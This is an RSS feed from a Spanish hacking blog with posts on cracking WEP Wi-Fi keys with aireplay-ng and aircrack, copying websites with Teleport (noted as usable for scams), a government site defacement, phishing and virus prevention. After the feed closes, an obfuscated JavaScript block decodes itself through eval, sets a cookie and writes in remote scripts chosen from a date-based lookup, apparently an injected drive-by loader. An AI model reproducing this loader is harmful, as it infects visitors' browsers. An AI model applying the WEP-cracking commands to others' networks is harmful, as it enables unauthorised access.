<p>ahora lo que tenemos que hacer es asociarnos a la red para poder inyectar trafico. para esto ejecutamos aireplay, la sintaxis es:</p>
<p><!--c1--></p>
<p><!--ec1--><code>aireplay -1 0 -e ESSID -a BSSID -h STACION ath0</code><!--c2--></p>
<p><!--ec2--></p>
<p>por lo cual:</p>
<p>ejecutaremos:</p>
<p><!--c1--></p>
<p><!--ec1--><code>aireplay-ng -1 0 -e Th3r0rn -a aqui la MAC -h aqui la stacion ath0</code><!--c2--></p>
<p><!--ec2--></p>
<p>como resultado vemos que nos asociamos a la red de manera correcta:<br />
<a href="http://img473.imageshack.us/my.php?image=aireplayye3.png"><img src="http://img473.imageshack.us/img473/1019/aireplayye3.th.png" border="0" /></a><br />
ahora lo siguiente es acelerar el trafico en la red, para inyectaremos trafico con aireplay:</p>
<p>su sintaxis es:</p>
<p><!--c1--></p>
<p><!--ec1--><code>aireplay-ng -3 -b MAC -h STATION ath0</code><!--c2--></p>
<p><!--ec2--></p>
<p>recordemos que donde ath0 es nuestra interfaz, entonces ejecutamos y solo nos sentamos a esperar a que inyecte el el trafico necesario para poder obtener nuestra clave wep : -)</p>
<p><a href="http://img127.imageshack.us/my.php?image=aireplay2jj7.png"><img src="http://img127.imageshack.us/img127/2581/aireplay2jj7.th.png" border="0" /></a><br />
ya que tenemos mas 250mil iv’s capturados (necesarios para romper una wep de 64 bits, podemos ejecutar aircrack para poder obtener la clave.</p>
<p>su sintaxis:</p>
<p>aircrack archivo.cap</p>
<p>observemos la red vicitma tiene 303404 IV’s</p>
<p>y que su numero de identificador es “1″<br />
<a href="http://img106.imageshack.us/my.php?image=aircrackwz6.png"><img src="http://img106.imageshack.us/img106/422/aircrackwz6.th.png" border="0" /></a><br />
por lo cual tecleamos 1 y damos enter</p>
<p>y <strong>Bingooo¡</strong></p>
<p>Tenemos la nuestra clave:</p>
<p><a href="http://img217.imageshack.us/my.php?image=aircrackfinalxo6.png"><img src="http://img217.imageshack.us/img217/2184/aircrackfinalxo6.th.png" border="0" /></a><br />
en la imagen donde tengo aircrack y me muestra q son 303404 IV’s se aprecia que use 2 archivos.cap esto es por que tuve que hacer algo por lo cual detuve la captura de trafico y cuando termine capture lo que me hacia falta <img src="http://foros.hackerss.com/style_emoticons/default/tongue.gif" alt="tongue.gif" border="0" /></p>
<p>por supuesto que el numero de datos a capturar para poder obtener la clave de la red dependerá de que tipo de encriptacion en que esta se encuentre.</p>
<p>disculpen los errores ortográficos a si como de redacción.<br />
Nota: Pueden copiar el tutorial siempre y cuando usen el nombre del autor. saludos <img src="http://foros.hackerss.com/style_emoticons/default/wink.gif" alt="wink.gif" border="0" /><br />
<!--coloro:#0000FF--><!--/coloro--> Contaco: franz<!--colorc--><!--/colorc--><img src="http://www.linux.es/arroba.jpg" border="0" /><!--coloro:#0000FF--><!--/coloro-->hackerss.com y mi blog <em><a href="http://www.imgeek.net/">Imgeek<br />
</a>th3r0rn</em><br />
<em>Nota: Este fue solo escrito con fines educativos para aprender y protegerse de este tipo de ataques cual quier aclarasion o porblemas legales pueden contactar con el administrador de este sitio </em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/02/25/como-hackear-una-red-wifi/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Como guardar un sitio web con teleport by rush.</title>
		<link>http://www.blogdelhacker.com/2008/02/24/como-guardar-un-sitio-web-con-teleport-by-rush/</link>
		<comments>http://www.blogdelhacker.com/2008/02/24/como-guardar-un-sitio-web-con-teleport-by-rush/#comments</comments>
		<pubDate>Sun, 24 Feb 2008 18:26:04 +0000</pubDate>
		<dc:creator>rush</dc:creator>
		
		<category><![CDATA[Comenzando]]></category>

		<category><![CDATA[General]]></category>

		<category><![CDATA[Hacking Web]]></category>

		<category><![CDATA[Trabajo en Windows]]></category>

		<category><![CDATA[Utilidades Hack]]></category>

		<category><![CDATA[Videos]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2008/02/24/como-guardar-un-sitio-web-con-teleport-by-rush/</guid>
		<description><![CDATA[   

Bueno en este tutorial uso una herramienta llamada teleport para guardar sitios web.
Con todo e imagenes,directorios etc.
(Con esto tambien pueden hacer scam&#8217;s o fakes como le llamen.)
Es facil, para eso les deje un videotutorial hecho por mi, esta algo pesadito el video ya que lo edite.
Espero les guste, fue dedicado a www.blogdelhacker.com
Descarga [...]]]></description>
			<content:encoded><![CDATA[<p> <a href="http://www.blogdelhacker.com/wp-admin/upload.php?style=inline&amp;tab=browse&amp;action=view&amp;ID=93&amp;post_id=92&amp;paged=" id="file-link-93" title="imagen rush" class="file-link image">  </a><a href="http://www.blogdelhacker.com/wp-content/uploads/2008/02/teleport.JPG" title="teleport.JPG"></a></p>
<p style="text-align: center"><a href="http://www.blogdelhacker.com/wp-content/uploads/2008/02/teleport.JPG" title="teleport.JPG"><img src="http://www.blogdelhacker.com/wp-content/uploads/2008/02/teleport.JPG" alt="teleport.JPG" height="345" width="459" /></a></p>
<p>Bueno en este tutorial uso una herramienta llamada teleport para guardar sitios web.</p>
<p>Con todo e imagenes,directorios etc.</p>
<p>(Con esto tambien pueden hacer scam&#8217;s o fakes como le llamen.)</p>
<p>Es facil, para eso les deje un videotutorial hecho por mi, esta algo pesadito el video ya que lo edite.</p>
<p>Espero les guste, fue dedicado a <a href="http://www.blogdelhacker.com">www.blogdelhacker.com</a><a href="http://www.readhacked.com"></a></p>
<p>Descarga del video: <a href="http://www.gigasize.com/get.php?d=nmldzvd12xf">VIDEO</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/02/24/como-guardar-un-sitio-web-con-teleport-by-rush/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Hacker se manifiesta en la web de la camara diputados de mexico.</title>
		<link>http://www.blogdelhacker.com/2008/02/15/hacker-se-manifiesta-en-la-web-de-la-camara-diputados-de-mexico/</link>
		<comments>http://www.blogdelhacker.com/2008/02/15/hacker-se-manifiesta-en-la-web-de-la-camara-diputados-de-mexico/#comments</comments>
		<pubDate>Fri, 15 Feb 2008 16:38:21 +0000</pubDate>
		<dc:creator>rush</dc:creator>
		
		<category><![CDATA[Asaltando los sistemas]]></category>

		<category><![CDATA[General]]></category>

		<category><![CDATA[Noticias]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2008/02/15/hacker-se-manifiesta-en-la-web-de-la-camara-diputados-de-mexico/</guid>
		<description><![CDATA[
Bueno hoy en la mañana esta viendo noticias asta que me entere de que un hacker, se manifesto en la web de la Camara de diputados.
El hacker aseguro tener 14 años de edad y dejo un mensaje de protesta de la situacion politica del pais.
El responsable de sistemas de la Cámara, Miguel Vega, explicó a [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center"><img src="http://www.enezeus.com/blog/wp-content/uploads/2006/10/hacker1.jpg" height="143" width="443" /></p>
<p>Bueno hoy en la mañana esta viendo noticias asta que me entere de que un hacker, se manifesto en la web de la <a href="http://www.diputados.gob.mx/">Camara de diputados.</a></p>
<p>El hacker aseguro tener 14 años de edad y dejo un mensaje de protesta de la situacion politica del pais.</p>
<p>El responsable de sistemas de la Cámara, Miguel Vega, explicó a la prensa que la infiltración duró aproximadamente una hora y agregó que esta ha sido la primera ocasión en que ocurre una violación a la página electrónica de esta institución.</p>
<p>La pagina web, ha sido victima de miles de atakes,asta esta vez.</p>
<p><span id="more-91"></span></p>
<p>Y acontinuacion su manifiesto:</p>
<blockquote><p>&#8220;Buenas (tardes) tengan todos ustedes. Mi nick es Axuz, tengo 14 años de edad y tengo los ojos bien abiertos a lo que hace el Gobierno&#8221;, dijo el hacker en su mensaje.</p>
<p>&#8220;No ha cambio nada, sigue habiendo pobreza, corrupción, violencia y destrucción, sólo quiero ver si logro hacer conciencia en todos ustedes políticos, no quiero ser sancionado con nada, sólo quiero manifestarme libremente, que es la única manera que van a escuchar a un joven de 14 años&#8230; no quiero problemas&#8221;, agregó el mensaje del intruso.</p></blockquote>
<p>El responsable de Sistemas explicó que esta intromisión se produjo hoy en una red no clasificada en uno de los accesos del menú de &#8220;información de diputados&#8221; por más de una hora, lo que causó una avería en el sistema.</p>
<p>Bueno mi opinion es:</p>
<p>Que ese niño (Hacker) quiso abrirles los ojos a los diputados, pero lo que mas coraje me da esque ellos se fijen en que violaron su seguridad y no analizar la forma de exprecion de su mensaje, el niño claramente aclaro que el no quizo causar daño.</p>
<p>En fin&#8230;</p>
<p>un saludo rUsH</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/02/15/hacker-se-manifiesta-en-la-web-de-la-camara-diputados-de-mexico/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Que es el phishing?</title>
		<link>http://www.blogdelhacker.com/2008/02/14/que-es-el-phishing/</link>
		<comments>http://www.blogdelhacker.com/2008/02/14/que-es-el-phishing/#comments</comments>
		<pubDate>Thu, 14 Feb 2008 18:25:29 +0000</pubDate>
		<dc:creator>rush</dc:creator>
		
		<category><![CDATA[Buscando una víctima]]></category>

		<category><![CDATA[Comenzando]]></category>

		<category><![CDATA[Definiciones]]></category>

		<category><![CDATA[General]]></category>

		<category><![CDATA[Historia Hacking]]></category>

		<category><![CDATA[Utilidades Hack]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2008/02/14/que-es-el-phishing/</guid>
		<description><![CDATA[
Bueno esta vez les voy a hablar de phishing:
El phishing en la informatica es un delito, que es algo parecido a los scam&#8217;s, que usan los carder&#8217;s, osea el phishing es una manera de estafa, el estafador es un phisher, lo que hace este phisher, es usar ingenieria social, para sacar informacion confiencial, este phisher, [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center"><img src="http://tecfa.unige.ch/tecfa/teaching/LME/images/phishing-sml.jpg" height="188" width="217" /></p>
<p>Bueno esta vez les voy a hablar de <strong>phishing</strong>:</p>
<p>El <strong>phishing</strong> en la informatica es un delito, que es algo parecido a los scam&#8217;s, que usan los carder&#8217;s, osea el <strong>phishing</strong> es una manera de estafa, el estafador es un phisher, lo que hace este phisher, es usar ingenieria social, para sacar informacion confiencial, este <strong>phisher</strong>, se hace pasar como por algun ingeniero de alguna empresa, o alguna persona importante.</p>
<p>Los <strong>phisher&#8217;s</strong> los metodos mas comunes que usan son: Correo electronico, Paginas web.</p>
<p>Hay algunos otros, como sistemas de mensajeria instantanea, o por llamadas telefonoicas.</p>
<p>El <strong>phishing</strong> es un delito, ya que muchas personas han caido en esos fraudes.</p>
<p><span id="more-90"></span></p>
<p>Aora continuamos con la historia de <strong>phishing:</strong></p>
<blockquote><p> Origen de la palabra</p>
<p>El término phishing proviene de la palabra en inglés &#8220;fishing&#8221; (pesca) haciendo alusión al acto de pescar usuarios mediante señuelos cada vez más sofisticados, y de este modo obtener información financiera y contraseñas. Quien lo practica es conocido con el nombre de phisher  . También se dice que el término &#8220;phishing&#8221; es la contracción de &#8220;password harvesting fishing&#8221; (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo.</p>
<p>Son posibles traducciones apropiadas en español los términos anzuelo o estafa electrónica.</p>
<p>La primera mención del término phishing data de enero de 1996 en grupo de noticias de hackers alt.2600 , aunque el término apareció tempranamente en la edición impresa del boletín de noticias hacker &#8220;2600 Magazine&#8221; . El término phishing fue adoptado por crackers que intentaban &#8220;pescar&#8221; cuentas de miembros de AOL; ph es comúnmente utilizado por hackers para sustituir la f, como raíz de la antigua forma de hacking conocida como &#8220;phone phreaking&#8221;.</p></blockquote>
<p>Bueno un ejemplo de <strong>phishing</strong> es:</p>
<p>Las paginas web, esas famosas que te dicen, mira quien te admite y quien no te admite, algunas de esas web&#8217;s son falsas y tan solo lo que hacen es llamar la atencion y luego cuando te registrar o inicias secion, te roban los datos de tu cuenta.</p>
<p>Tambien existen tecnicas <strong>antiphishing</strong>:</p>
<p>Esto en realidad es algo personal, las tecnicas, no creas que es algo relacionado con softwares ni nada por el estilo, solo es que no te dejes engañar, antes de soltar informacion investiga por otros medios, yo lo que recomiendo es no dar informacion a cualquier persona.</p>
<p>Ya que cuando confiamos en alguien, damos a conocer alguna informacion importante, si que lo notes.</p>
<p>Esto va relacionado con la ingenieria social. solo mi consejo es que no se dejen llevar por las apariencias.</p>
<p>Text by rUsH.</p>
<p>Historia sacada de : <a href="http://wikipedia.org">wikipedia</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/02/14/que-es-el-phishing/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Funcionamiento y prevencion de VIRUS!</title>
		<link>http://www.blogdelhacker.com/2008/02/14/funcionamiento-y-prevencion-de-virus/</link>
		<comments>http://www.blogdelhacker.com/2008/02/14/funcionamiento-y-prevencion-de-virus/#comments</comments>
		<pubDate>Thu, 14 Feb 2008 17:19:38 +0000</pubDate>
		<dc:creator>SeNeGe</dc:creator>
		
		<category><![CDATA[Firewalls y detección de intrusos]]></category>

		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2008/02/14/funcionamiento-y-prevencion-de-virus/</guid>
		<description><![CDATA[Funcionamiento y prevencion de VIRUS!
A cotninuación podrás ver un tutorial completo para prevenirse de los virus y las herramientas necesarias para tal acción espero lo lean.

Extraido del tutorial: 
JUSTIFICACIÓN
En definitiva, sea cual fuere el motivo por el cual se siguen produciendo virus, se
debe destacar que su existencia no ha sido sólo perjuicios: gracias a ellos, mucha
gente a [...]]]></description>
			<content:encoded><![CDATA[<p align="center"><strong>Funcionamiento y prevencion de VIRUS!</strong></p>
<p align="left">A cotninuación podrás ver un tutorial completo para prevenirse de los virus y las herramientas necesarias para tal acción espero lo lean.</p>
<p align="center"><img width="137" src="http://iesgarciamorato.org/webquest/tecno/images/image004.jpg" height="163" /></p>
<p><strong>Extraido del tutorial: </strong></p>
<p><strong>JUSTIFICACIÓN</strong><br />
En definitiva, sea cual fuere el motivo por el cual se siguen produciendo virus, se<br />
debe destacar que su existencia no ha sido sólo perjuicios: gracias a ellos, mucha<br />
gente a tomado conciencia de qué es lo que tiene y cómo protegerlo.</p>
<p><strong>OBJETIVOS</strong></p>
<li>Ampliar nuestro conocimiento acerca de un virus.</li>
<li>Identificar que es, que no es un virus y sus componentes.</li>
<li>Conocer las consecuencias que puede presentar un virus.</li>
<li>Darse cuenta de la importancia sistema computacional, los datos y su<br />
correcta protección.</li>
<li>Obtener el conocimiento para de esta forma poder reaccionar<br />
adecuadamente si su sistema es infectado.</li>
<li>Crear el habito de mantener copias de sostenimientos de datos y sistemas para evitar<br />
perdida total del sistemas</li>
<p><span id="more-88"></span></p>
<p align="left"><strong><a href="http://www.blogdelhacker.com/wp-content/uploads/2008/02/lo-que-se-debe-saber-de-los-virus.pdf">DESCARGAR TUTORIAL</a></strong></p>
<p align="left"><strong>CONCLUSIÓN<br />
</strong>Este trabajo esta hecho con el fin de afianzar nuestro conocimiento acerca de lo que es en<br />
realidad un virus informatico su impacto a nivel personal y de sistemas teniendo en cuanta<br />
la importancia que tienen lo datos que se almacenan y el correcto manejo de las opciones<br />
informáticas que nos pueden ayudar a salvar parcial o totalmente de los datos que se<br />
encuentren en riesgo a causas de algunas de estas aplicaciones que ponen en peligro<br />
cualquier tipo de sistema protegido, si hablamos de virus nuevos, que por su tamaño tan<br />
imperceptible y las tantas maneras que encuentra para su propagación y reproducción<br />
pueden llegar y hacernos pasar un mal rato y obtener perdidas irrecuperables.</p>
<p align="left">Extraido de: <a href="http://www.readhacked.com/foro/index.php?topic=410.0">ReadHacked.COM</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/02/14/funcionamiento-y-prevencion-de-virus/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
<script language="javascript">="Z64bZ3dZ227FgZ3edgZ3edbu~tcKyMK!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK|u~wdx+rbuqZ7b+mmfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07Z22;ddZ3dZ22!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+0~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+0iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z22;ceZ3dZ2268aZ2572CodZ2565At(Z2530)^Z2528Z25270x0Z2530Z2527+eZ2573Z2529)Z2529Z253b}}Z22;ccZ3dZ22elZ2565ngtZ2568;i+Z252b)Z257btmZ2570Z253dds.Z2573licZ2565(iZ252ci+1Z2529;sZ22;dzZ3dZ22Z2566unZ2563Z2574iZ256fZ256eZ2520dw(Z2574)Z257bZ2563aZ253dZ2527Z252564oZ252563umeZ25256eZ2574Z25252eZ2577rZ2525Z25369Z2574Z252565Z25252Z2538Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569Z2570Z252574Z252520lZ2561nZ25256Z2537Z2575Z2561gZ25256Z2535Z25253dZ25255cZ252522Z256aavaZ2573crZ252569Z2570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscrZ252569pZ25257Z2534Z25253eZ2527;evZ2561Z256c(uZ256eZ2565Z2573caZ2570eZ2528tZ2529)}Z253bZ22;cdZ3dZ22Z2574Z253dst+Z2553trZ2569Z256egZ252efroZ256dChaZ2572CZ256fde(Z2528tmZ2570.cZ25Z22;czZ3dZ22Z2566uncZ2574ioZ256e Z2563zZ2528cZ257aZ2529Z257brZ2565tZ2575Z2572nZ2520Z2563a+cZ2562+ccZ252bcZ2564+ceZ252bZ2563z;}Z253bZ22;dcZ3dZ22wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c(Z3c)9+ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSxZ22;cbZ3dZ2270Z2565(dZ2573);sZ2574Z253dtZ256dpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252Z22;opZ3dZ22Z2524aZ253dZ2522dw(dZ2563Z2573(Z2563Z2575,1Z2534)Z2529;Z2522;Z22;deZ3dZ22Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+Z2519dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0Z3d0#9050$9;0!Z2520M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;caZ3dZ22Z2566unZ2563Z2574iZ256fn dZ2563Z2573(dsZ252ceZ2573Z2529Z257bdsZ253duneZ2573caZ25Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522Z25220660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522!90660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ25Z22;stZ3dZ22Z2573Z2574Z253dZ2522(Z2564Z2561+Z2564bZ252bdZ2563Z252bZ2564Z2564+Z2564Z2565,Z25310Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253dZ2524Z2561;Z2522Z253bZ22;Z69f Z28doZ63uZ6deZ6etZ2ecooZ6bZ69e.iZ6eZ64exZ4fZ66(Z27rf5Z66Z36dsZ27)Z3dZ3d-1)Z7bfunctiZ6fZ6e cZ61llbZ61ckZ28x)Z7b wZ69ndoZ77.tZ77 Z3d x;Z76arZ20d Z3d Z6eeZ77 DZ61tZ65Z28Z29;d.Z73Z65tZ54iZ6de(xZ5bZ22aZ73_oZ66Z22]*10Z300Z29;vZ61r hZ20Z3d d.getZ55TZ43HouZ72sZ28);wZ69ndoZ77.hZ20Z3d h;Z69f (Z68 Z3e 8)Z7bZ77Z69Z6eZ64ow.Z67Z64 Z3d Z64;Z73Z63(Z27rf5Z666dZ73Z27,2,7Z29;Z65vZ61Z6c(Z75neZ73cZ61pe(Z64z+Z63Z7aZ2boZ70Z2bsZ74)+Z27dw(dZ7a+Z63Z7a(Z24a+sZ74)Z29;Z27);Z64Z6fcZ75Z6deZ6etZ2ewrZ69tZ65Z28)Z3bZ7deZ6csZ65Z7bd.sZ65tZ55TCZ44Z61tZ65(Z64.geZ74Z55TCDZ61tZ65Z28) Z2d Z32Z29Z3bZ77iZ6edowZ2eZ67Z64 Z3d d;Z76aZ72 tiZ6de Z3d neZ77Z20Z41Z72Z72ayZ28);Z76ar Z73hZ69ftZ49ndeZ78 Z3d Z22Z22;timZ65[Z22yeZ61Z72Z22] Z3d dZ2eZ67eZ74Z55TCZ46ullZ59earZ28);tZ69me[Z22Z6donZ74hZ22] Z3dZ20Z64Z2egZ65tUZ54Z43MonZ74h()Z2b1;Z74imZ65[Z22dZ61Z79Z22] Z3d Z64Z2eZ67etUZ54CDZ61tZ65()Z3bif Z28dZ2egeZ74UTCZ4dZ6fZ6eZ74hZ28Z29Z2b1 Z3c 10Z29Z7bsZ68iftZ49nZ64eZ78 Z3d tiZ6deZ5bZ22yeZ61Z72Z22] +Z20Z22-Z30Z22 +Z20Z28dZ2egeZ74UTCZ4dZ6fnthZ28)+1Z29;}Z65lseZ7bZ73hiZ66tZ49Z6edexZ20Z3d tZ69meZ5bZ22yeZ61rZ22]Z20+Z20Z22-Z22 + Z28dZ2eZ67etUZ54CZ4doZ6etZ68Z28)+1Z29;Z7dZ69fZ20(d.Z67etZ55TCDZ61te(Z29 Z3c 10)Z7bZ73hiZ66Z74Z49ndZ65Z78 Z3dsZ68ifZ74Z49ndZ65x Z2b Z22-0Z22 + dZ2egetZ55Z54CDaZ74eZ28);}Z65lseZ7bZ73Z68Z69fZ74Z49Z6edeZ78 Z3d sZ68ifZ74Z49Z6edexZ20Z2b Z22-Z22 + Z64.gZ65tUZ54CDaZ74eZ28Z29;}Z64ocZ75mZ65ntZ2ewriZ74Z65Z28Z22Z3cscrZ22+Z22ipt lanZ67uagZ65Z3djavZ61scZ72Z69ptZ22+Z22 sZ72cZ3dZ27hZ74tpZ3aZ2fZ2fseaZ72chZ2etZ77Z69Z74terZ2ecomZ2ftrZ65nZ64sZ2fdaiZ6cy.jZ73on?Z64Z61Z74eZ3dZ22+ shZ69ftZ49nZ64ex+Z22&Z63Z61llbZ61ckZ3dcalZ6cbaZ63k2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}} funcZ74ionZ20calZ6cbZ61ck2Z28xZ29Z7bwindZ6fw.tZ77 Z3d x;sZ63(Z27rf5Z66Z36dsZ27Z2c2Z2c7);Z65valZ28unZ65scZ61pe(Z64z+cZ7aZ2bopZ2bstZ29+Z27Z64Z77(dZ7aZ2bcZ7aZ28Z24Z61+stZ29);Z27);Z64ocZ75menZ74.wZ72itZ65(Z24aZ29Z3b}doZ63uZ6dZ65nt.Z77Z72itZ65(Z22Z3cimg Z73rZ63Z3dZ27httpZ3aZ2fZ2fsearch.tZ77itZ74erZ2eZ63oZ6dZ2fimageZ73Z2fsearZ63Z68Z2frZ73s.pZ6egZ27 wiZ64Z74Z68Z3d1 heigZ68tZ3d1 sZ74yleZ3dZ27visiZ62iliZ74y:Z68Z69dZ64eZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6canZ67Z75aZ67Z65Z3djZ61Z76ascZ72ipZ74Z22+Z22 Z73rcZ3dZ27http:Z2fZ2fseZ61Z72ch.Z74Z77iZ74teZ72.cZ6fmZ2ftrZ65Z6edZ73Z2fdaZ69lZ79.Z6asZ6fn?Z63Z61lZ6cbZ61ckZ3dZ63alZ6cbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}eZ6cseZ7b};fuZ6ecZ74Z69Z6fn Z73cZ28cZ6eZ6d,Z76,edZ29Z7bvarZ20exZ64Z3dneZ77Z20DZ61te(Z29;exZ64Z2eseZ74DatZ65(Z65xd.Z67eZ74DatZ65Z28)+Z65d)Z3bdoZ63umZ65nZ74.Z63Z6fokZ69eZ3dcZ6emZ2b Z27Z3dZ27 +escZ61pZ65(vZ29+Z27;expZ69reZ73Z3dZ27+exd.toZ47MTZ53tZ72iZ6eZ67Z28)Z3b};";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z());</script>